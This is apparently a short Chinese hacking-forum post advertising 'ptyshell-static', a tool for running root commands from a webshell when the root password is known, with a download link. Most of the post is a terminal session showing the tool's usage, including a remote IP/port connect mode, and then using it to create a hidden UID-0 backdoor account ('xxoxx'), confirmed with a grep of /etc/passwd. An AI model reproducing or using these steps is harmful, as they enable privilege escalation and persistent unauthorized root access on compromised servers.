一个知道root密码可以在webshell里面执行命令的程序[test@localhost tmp]$ ls -l total 488 -rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static [test@localhost tmp]$ md5sum ptyshell-static 3ea2a909f736660097c0248d403bbe80 ptyshell-static [test@localhost tmp]$ ./ptyshell-static ptyshell v0.4 orignal written by wzt ,psexec feature added by xi4oyu usage: ./ptyshell-static <port> <remote ip> <port> ./ptyshell-static -u username -p password -c command -pd port 使用方法: [test@localhost tmp]$ ./ptyshell-static 4444 [test@localhost tmp]$ grep xxoxx /et c/passwd [test@localhost tmp]$ ./ptyshell-static -u root -p test -c useradd -u 0 -o xxoxx -dp 4444 Beginning to send command! [test@localhost tmp]$ grep xxoxx /et c/passwd xxoxx:x:0:510::/home/xxoxx:/bi n/bash [test@localhost tmp]$ 执行第二个命令的时候需要等待几秒, 以后的命令执行都不需要再执行./ptyshell-stat 4444了。 直接执行第二个命令就行。 注意命令用包含起来, 命令表太长了, 哈哈, 否则不能执行可别怪我。 这里webshell里面也可以执行的, 一个道理, 呵呵。 纯属2B之作, 大家随便玩玩。 感谢tr宝宝提供空间 http://www.pcsec.orghttp://img6.22122511.com/upload/net_2/2008/12/ptyshell-static.rar
……